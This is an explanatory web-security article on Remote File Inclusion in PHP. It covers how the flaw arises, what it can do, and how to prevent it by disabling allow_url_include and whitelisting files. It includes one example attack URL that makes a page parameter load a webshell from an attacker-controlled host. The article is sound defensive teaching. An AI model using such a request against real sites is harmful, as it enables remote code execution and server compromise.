Introduction to the Remote File Inclusion
A remote file inclusion (also known as RFI) occurs when a file from a remote server is included into a web page. Such behaviour can be developed on purpose on web applications, for example to show content from a remote website inside another website. Though it can also happen by accident or by a misconfiguration of the respective programming language, and in such case it can be exploited.
Even though this kind of inclusion can occur in almost every kind of web application, those written in PHP are more likely to to be vulnerable to Remote File Inclusion because PHP provides native functions that allow the inclusion of remote files, while other languages usually require a workaround to imitate this behavior.
How does Remote File Inclusion work?
In order to include a remote file you have to pass a string with the url of the file to an include function of the respective language, e.g. PHP. After that the web server makes a request to the remote file, fetches its contents and includes it into the web page serving the content. It is then parsed by the interpreter of the used language.
How Can a Web Application Be Vulnerable to a Remote File Inclusion?
There are only few scenarios where remote file inclusion is actually needed, in fact by default it is often disabled, though it is still used. PHP introduced the php.ini configuration option in 5.2.0 to automatically disable RFI. Nonetheless it is sometimes enabled by a developer on purpose, or comes preconfigured with older versions of the server side programming language.
Usually developers enable such functionality to include a local file, though without proper input validation it is also possible to fetch data from a remote server. Therefore in most cases when such functionality is enabled, the web application is vulnerable to both Remote and Local File Inclusion.
Exploiting a Remote File Inclusion Vulnerability
The developer wants to include a local file depending on the get parameter page. He has different files such as contact.php, main.php and about.php, all of which provide different functionality to the website. Each file can be called using the following request:
https://example.com/index.php?page=contact.php
While the developer expects that only files inside that folder are included it might be possible for an attacker to include files from another directory (LFI) or even from a completely different web server (RFI). In fact without whitelisting, the attacker is able to change the filepath to the programming language’s include function.
The attacker can include a local file, but in a typical attack he changes the path to a file which resides on a server the attacker is controlling. That way he can easily write his malicious code inside a file without having to poison logs or otherwise inject code inside the web server, as what would happen in case of LFI. An attack could look like this:
https://example.com/index.php?page=https://attacker.com/uploads/webshell.txt
What is the impact of an Exploited Remote File Inclusion?
Impact may differ depending on the execution permissions of the web server user. Any included source code could be executed by the web server in the context of the web server user, hence making arbitrary code execution possible. Where the webserver user has administrative privileges, full system compromise is also possible.
How to Prevent Remote File Inclusion Vulnerabilities
To prevent possible exploitation of the remote file inclusions vulnerability you should always disable the remote inclusion feature in your programming languages configuration, especially if you do not need it. In PHP you can set allow_url_include to 0. You should also validate user input before you pass it to an inclusion function. The recommended way to do this is with a whitelist of allowed files.